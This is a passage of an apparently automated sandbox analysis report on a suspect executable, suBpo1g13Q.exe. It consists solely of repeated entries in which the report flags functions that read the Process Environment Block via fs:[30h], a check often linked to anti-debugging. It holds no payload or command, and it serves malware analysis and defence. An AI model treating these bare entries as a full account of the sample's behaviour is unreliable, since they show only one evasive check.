                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4260 mov eax, dword ptr fs:[00000030h]4_2_014A4260
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4260 mov eax, dword ptr fs:[00000030h]4_2_014A4260
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4260 mov eax, dword ptr fs:[00000030h]4_2_014A4260
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149823B mov eax, dword ptr fs:[00000030h]4_2_0149823B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015762D6 mov eax, dword ptr fs:[00000030h]4_2_015762D6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h]4_2_014AA2C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h]4_2_014AA2C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h]4_2_014AA2C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h]4_2_014AA2C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA2C3 mov eax, dword ptr fs:[00000030h]4_2_014AA2C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B02E1 mov eax, dword ptr fs:[00000030h]4_2_014B02E1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B02E1 mov eax, dword ptr fs:[00000030h]4_2_014B02E1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B02E1 mov eax, dword ptr fs:[00000030h]4_2_014B02E1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE284 mov eax, dword ptr fs:[00000030h]4_2_014DE284
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE284 mov eax, dword ptr fs:[00000030h]4_2_014DE284
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01520283 mov eax, dword ptr fs:[00000030h]4_2_01520283
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01520283 mov eax, dword ptr fs:[00000030h]4_2_01520283
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01520283 mov eax, dword ptr fs:[00000030h]4_2_01520283
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B02A0 mov eax, dword ptr fs:[00000030h]4_2_014B02A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B02A0 mov eax, dword ptr fs:[00000030h]4_2_014B02A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h]4_2_015362A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015362A0 mov ecx, dword ptr fs:[00000030h]4_2_015362A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h]4_2_015362A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h]4_2_015362A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h]4_2_015362A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015362A0 mov eax, dword ptr fs:[00000030h]4_2_015362A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A8550 mov eax, dword ptr fs:[00000030h]4_2_014A8550
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A8550 mov eax, dword ptr fs:[00000030h]4_2_014A8550
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D656A mov eax, dword ptr fs:[00000030h]4_2_014D656A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D656A mov eax, dword ptr fs:[00000030h]4_2_014D656A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D656A mov eax, dword ptr fs:[00000030h]4_2_014D656A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01536500 mov eax, dword ptr fs:[00000030h]4_2_01536500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574500 mov eax, dword ptr fs:[00000030h]4_2_01574500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574500 mov eax, dword ptr fs:[00000030h]4_2_01574500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574500 mov eax, dword ptr fs:[00000030h]4_2_01574500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574500 mov eax, dword ptr fs:[00000030h]4_2_01574500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574500 mov eax, dword ptr fs:[00000030h]4_2_01574500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574500 mov eax, dword ptr fs:[00000030h]4_2_01574500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574500 mov eax, dword ptr fs:[00000030h]4_2_01574500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h]4_2_014CE53E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h]4_2_014CE53E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h]4_2_014CE53E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h]4_2_014CE53E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE53E mov eax, dword ptr fs:[00000030h]4_2_014CE53E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0535 mov eax, dword ptr fs:[00000030h]4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE5CF mov eax, dword ptr fs:[00000030h]4_2_014DE5CF
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE5CF mov eax, dword ptr fs:[00000030h]4_2_014DE5CF
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A65D0 mov eax, dword ptr fs:[00000030h]4_2_014A65D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA5D0 mov eax, dword ptr fs:[00000030h]4_2_014DA5D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA5D0 mov eax, dword ptr fs:[00000030h]4_2_014DA5D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC5ED mov eax, dword ptr fs:[00000030h]4_2_014DC5ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC5ED mov eax, dword ptr fs:[00000030h]4_2_014DC5ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A25E0 mov eax, dword ptr fs:[00000030h]4_2_014A25E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE5E7 mov eax, dword ptr fs:[00000030h]4_2_014CE5E7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D4588 mov eax, dword ptr fs:[00000030h]4_2_014D4588
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A2582 mov eax, dword ptr fs:[00000030h]4_2_014A2582
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A2582 mov ecx, dword ptr fs:[00000030h]4_2_014A2582
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE59C mov eax, dword ptr fs:[00000030h]4_2_014DE59C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015205A7 mov eax, dword ptr fs:[00000030h]4_2_015205A7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015205A7 mov eax, dword ptr fs:[00000030h]4_2_015205A7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015205A7 mov eax, dword ptr fs:[00000030h]4_2_015205A7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C45B1 mov eax, dword ptr fs:[00000030h]4_2_014C45B1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C45B1 mov eax, dword ptr fs:[00000030h]4_2_014C45B1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155A456 mov eax, dword ptr fs:[00000030h]4_2_0155A456
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE443 mov eax, dword ptr fs:[00000030h]4_2_014DE443
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149645D mov eax, dword ptr fs:[00000030h]4_2_0149645D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C245A mov eax, dword ptr fs:[00000030h]4_2_014C245A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152C460 mov ecx, dword ptr fs:[00000030h]4_2_0152C460
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CA470 mov eax, dword ptr fs:[00000030h]4_2_014CA470
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CA470 mov eax, dword ptr fs:[00000030h]4_2_014CA470
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CA470 mov eax, dword ptr fs:[00000030h]4_2_014CA470
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D8402 mov eax, dword ptr fs:[00000030h]4_2_014D8402
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D8402 mov eax, dword ptr fs:[00000030h]4_2_014D8402
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D8402 mov eax, dword ptr fs:[00000030h]4_2_014D8402
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149E420 mov eax, dword ptr fs:[00000030h]4_2_0149E420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149E420 mov eax, dword ptr fs:[00000030h]4_2_0149E420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149E420 mov eax, dword ptr fs:[00000030h]4_2_0149E420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149C427 mov eax, dword ptr fs:[00000030h]4_2_0149C427
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01526420 mov eax, dword ptr fs:[00000030h]4_2_01526420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA430 mov eax, dword ptr fs:[00000030h]4_2_014DA430
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A04E5 mov ecx, dword ptr fs:[00000030h]4_2_014A04E5
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155A49A mov eax, dword ptr fs:[00000030h]4_2_0155A49A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A64AB mov eax, dword ptr fs:[00000030h]4_2_014A64AB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152A4B0 mov eax, dword ptr fs:[00000030h]4_2_0152A4B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D44B0 mov ecx, dword ptr fs:[00000030h]4_2_014D44B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D674D mov esi, dword ptr fs:[00000030h]4_2_014D674D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D674D mov eax, dword ptr fs:[00000030h]4_2_014D674D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D674D mov eax, dword ptr fs:[00000030h]4_2_014D674D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01524755 mov eax, dword ptr fs:[00000030h]4_2_01524755
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E75D mov eax, dword ptr fs:[00000030h]4_2_0152E75D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0750 mov eax, dword ptr fs:[00000030h]4_2_014A0750
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2750 mov eax, dword ptr fs:[00000030h]4_2_014E2750
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2750 mov eax, dword ptr fs:[00000030h]4_2_014E2750
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A8770 mov eax, dword ptr fs:[00000030h]4_2_014A8770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0770 mov eax, dword ptr fs:[00000030h]4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC700 mov eax, dword ptr fs:[00000030h]4_2_014DC700
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0710 mov eax, dword ptr fs:[00000030h]4_2_014A0710
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D0710 mov eax, dword ptr fs:[00000030h]4_2_014D0710
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151C730 mov eax, dword ptr fs:[00000030h]4_2_0151C730
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC720 mov eax, dword ptr fs:[00000030h]4_2_014DC720
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC720 mov eax, dword ptr fs:[00000030h]4_2_014DC720
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D273C mov eax, dword ptr fs:[00000030h]4_2_014D273C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D273C mov ecx, dword ptr fs:[00000030h]4_2_014D273C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D273C mov eax, dword ptr fs:[00000030h]4_2_014D273C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AC7C0 mov eax, dword ptr fs:[00000030h]4_2_014AC7C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015207C3 mov eax, dword ptr fs:[00000030h]4_2_015207C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C27ED mov eax, dword ptr fs:[00000030h]4_2_014C27ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C27ED mov eax, dword ptr fs:[00000030h]4_2_014C27ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C27ED mov eax, dword ptr fs:[00000030h]4_2_014C27ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A47FB mov eax, dword ptr fs:[00000030h]4_2_014A47FB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A47FB mov eax, dword ptr fs:[00000030h]4_2_014A47FB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E7E1 mov eax, dword ptr fs:[00000030h]4_2_0152E7E1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154678E mov eax, dword ptr fs:[00000030h]4_2_0154678E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A07AF mov eax, dword ptr fs:[00000030h]4_2_014A07AF
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015547A0 mov eax, dword ptr fs:[00000030h]4_2_015547A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BC640 mov eax, dword ptr fs:[00000030h]4_2_014BC640
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA660 mov eax, dword ptr fs:[00000030h]4_2_014DA660
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA660 mov eax, dword ptr fs:[00000030h]4_2_014DA660
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156866E mov eax, dword ptr fs:[00000030h]4_2_0156866E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156866E mov eax, dword ptr fs:[00000030h]4_2_0156866E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D2674 mov eax, dword ptr fs:[00000030h]4_2_014D2674
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B260B mov eax, dword ptr fs:[00000030h]4_2_014B260B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2619 mov eax, dword ptr fs:[00000030h]4_2_014E2619
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E609 mov eax, dword ptr fs:[00000030h]4_2_0151E609
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A262C mov eax, dword ptr fs:[00000030h]4_2_014A262C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE627 mov eax, dword ptr fs:[00000030h]4_2_014BE627
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D6620 mov eax, dword ptr fs:[00000030h]4_2_014D6620
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D8620 mov eax, dword ptr fs:[00000030h]4_2_014D8620
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA6C7 mov ebx, dword ptr fs:[00000030h]4_2_014DA6C7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA6C7 mov eax, dword ptr fs:[00000030h]4_2_014DA6C7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E6F2 mov eax, dword ptr fs:[00000030h]4_2_0151E6F2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E6F2 mov eax, dword ptr fs:[00000030h]4_2_0151E6F2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E6F2 mov eax, dword ptr fs:[00000030h]4_2_0151E6F2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E6F2 mov eax, dword ptr fs:[00000030h]4_2_0151E6F2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015206F1 mov eax, dword ptr fs:[00000030h]4_2_015206F1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015206F1 mov eax, dword ptr fs:[00000030h]4_2_015206F1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4690 mov eax, dword ptr fs:[00000030h]4_2_014A4690
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4690 mov eax, dword ptr fs:[00000030h]4_2_014A4690
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC6A6 mov eax, dword ptr fs:[00000030h]4_2_014DC6A6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D66B0 mov eax, dword ptr fs:[00000030h]4_2_014D66B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01520946 mov eax, dword ptr fs:[00000030h]4_2_01520946
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574940 mov eax, dword ptr fs:[00000030h]4_2_01574940
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E096E mov eax, dword ptr fs:[00000030h]4_2_014E096E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E096E mov edx, dword ptr fs:[00000030h]4_2_014E096E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E096E mov eax, dword ptr fs:[00000030h]4_2_014E096E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01544978 mov eax, dword ptr fs:[00000030h]4_2_01544978
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01544978 mov eax, dword ptr fs:[00000030h]4_2_01544978
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C6962 mov eax, dword ptr fs:[00000030h]4_2_014C6962
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C6962 mov eax, dword ptr fs:[00000030h]4_2_014C6962
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C6962 mov eax, dword ptr fs:[00000030h]4_2_014C6962
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152C97C mov eax, dword ptr fs:[00000030h]4_2_0152C97C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152C912 mov eax, dword ptr fs:[00000030h]4_2_0152C912
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01498918 mov eax, dword ptr fs:[00000030h]4_2_01498918
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01498918 mov eax, dword ptr fs:[00000030h]4_2_01498918
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E908 mov eax, dword ptr fs:[00000030h]4_2_0151E908
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E908 mov eax, dword ptr fs:[00000030h]4_2_0151E908
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152892A mov eax, dword ptr fs:[00000030h]4_2_0152892A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0153892B mov eax, dword ptr fs:[00000030h]4_2_0153892B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156A9D3 mov eax, dword ptr fs:[00000030h]4_2_0156A9D3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015369C0 mov eax, dword ptr fs:[00000030h]4_2_015369C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D49D0 mov eax, dword ptr fs:[00000030h]4_2_014D49D0
